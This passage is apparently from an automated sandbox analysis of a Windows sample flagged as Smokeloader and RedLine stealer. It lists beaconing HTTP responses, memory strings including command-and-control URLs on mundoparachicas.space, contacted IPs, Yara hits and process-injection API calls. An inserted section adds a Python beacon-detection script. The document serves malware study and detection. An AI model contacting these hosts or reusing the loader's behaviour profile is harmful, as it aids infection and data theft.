      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:50:20 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:50:25 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:50:30 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:50:35 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:50:40 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:50:46 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:50:51 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:50:58 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:51:04 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:51:09 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:51:14 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:51:19 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:51:24 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:51:29 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:51:34 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:51:39 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:51:45 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:51:50 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:51:55 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:52:00 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1750648090.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1750648090.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1750648090.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1750648090.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1749984821.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1751253415.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1750347122.0000000008720000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1749370203.00000000079B1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000000.1758007071.000000000C893000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1750648090.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1750648090.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1748703130.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1748144238.0000000001240000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1750648090.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1750648090.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1750648090.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: 70C1.exe, 00000006.00000002.2415753846.000001CD0D25D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mundoparachicas.space/
Source: AA31.exe, 00000007.00000002.2486672501.00000253616AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mundoparachicas.space/Lp_
Source: 70C1.exe, 00000006.00000002.2416403433.000001CD0D46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://mundoparachicas.space/dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO
Source: AA31.exe, 00000007.00000002.2487346926.000002536186A000.00000004.00001000.00020000.00000000.sdmp, AA31.exe, 00000007.00000003.2475368432.00000253616C0000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2486877032.00000253616DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LO
Source: explorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1758007071.000000000C557000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown | HTTPS traffic detected: 45.130.41.250:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49758 version: TLS 1.2
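The fourteen 404 responses at the top of this table arrive a few seconds apart, come from the same nginx server, and carry the same 7-byte body, which is the shape of a loader check-in rather than a browser fetching a missing page. The script below is an added example and not part of the Joe Sandbox report: it rebuilds rows in the column layout used on this page from the response timestamps in the report (the row template, the `make_rows` helper and the jitter and hit-count thresholds are constructed assumptions), then scores interval regularity and body constancy so the beacon pattern can be judged from the report text alone.

```python
"""Beacon check over the report's 'HTTP traffic detected' rows (added example)."""
import re
import statistics
from email.utils import parsedate_to_datetime

# Response timestamps copied from the report rows; everything else in the
# row template below is constructed to mirror the report's column layout.
REPORT_TIMES = [
    "12:50:51", "12:50:58", "12:51:04", "12:51:09", "12:51:14", "12:51:19",
    "12:51:24", "12:51:29", "12:51:34", "12:51:39", "12:51:45", "12:51:50",
    "12:51:55", "12:52:00",
]

ROW_TEMPLATE = (
    "Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | "
    "Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 {t} GMT | "
    "Content-Type: text/html; charset=utf-8 | Connection: close | "
    "Data Raw: {raw} | Data Ascii: r"
)


def make_rows(times, raw="03 00 00 00 72 e8 84"):
    """Build report-style rows for a list of HH:MM:SS timestamps (constructed data)."""
    return [ROW_TEMPLATE.format(t=t, raw=raw) for t in times]


DATE_RE = re.compile(r"Date: ([^|]+?) \|")
RAW_RE = re.compile(r"Data Raw: ([0-9a-fA-F ]+?) \|")
STATUS_RE = re.compile(r"HTTP traffic detected: HTTP/1\.\d (\d{3})")


def parse_row(row):
    """Pull the response timestamp, status code and raw body bytes out of one row."""
    return {
        "ts": parsedate_to_datetime(DATE_RE.search(row).group(1).strip()),
        "status": int(STATUS_RE.search(row).group(1)),
        "body": bytes.fromhex(RAW_RE.search(row).group(1).replace(" ", "")),
    }


def beacon_profile(rows, max_jitter_s=2.0, min_hits=4):
    """Summarise inter-arrival regularity and body constancy of the responses.

    max_jitter_s and min_hits are assumed analyst thresholds, not report values.
    """
    events = sorted((parse_row(r) for r in rows), key=lambda e: e["ts"])
    deltas = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(events, events[1:])]
    bodies = {e["body"] for e in events}
    mean = statistics.fmean(deltas) if deltas else 0.0
    # population std-dev of the gaps: near zero means a fixed sleep loop
    jitter = statistics.pstdev(deltas) if len(deltas) > 1 else 0.0
    periodic = len(events) >= min_hits and jitter <= max_jitter_s
    return {
        "count": len(events),
        "mean_interval_s": round(mean, 2),
        "jitter_s": round(jitter, 2),
        "statuses": {e["status"] for e in events},
        "constant_body": len(bodies) == 1,
        "body_len": len(next(iter(bodies))) if bodies else 0,
        "looks_like_beacon": periodic and len(bodies) == 1,
    }


if __name__ == "__main__":
    print(beacon_profile(make_rows(REPORT_TIMES)))
```

On the report's own timestamps this yields a mean gap of about 5.3 s with well under a second of jitter and a single 7-byte body across all fourteen responses. The check only sees the response side that this table exposes; a 404 status on its own proves nothing, and a real triage would pair these rows with the request URIs and the process that issued them.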

      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

Source: 00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2060868077.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_00402FD3 RtlCreateUserThread,NtTerminateProcess
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_0040267C NtEnumerateKey
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_004020C4 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_004020E3 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_004020E7 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_004020FC LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_004020B6 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_004020B8 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_00403149 RtlCreateUserThread,NtTerminateProcess
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,towlower
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_004025DD NtOpenKey
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_00402FD3 RtlCreateUserThread,NtTerminateProcess
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_0040267C NtEnumerateKey
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_004020C4 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_004020E3 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_004020E7 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_004020FC LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_004020B6 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_004020B8 LocalAlloc,NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_00403149 RtlCreateUserThread,NtTerminateProcess
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_004025DD NtOpenKey
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_00425673
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_0042512F
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_00426ACC
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_00424BEB
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_00425673
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_0042512F
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_00426ACC
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_00424BEB
Source: C:\Users\user\AppData\Local\Temp\70C1.exe | Code function: 6_2_00007FF7DAD68920
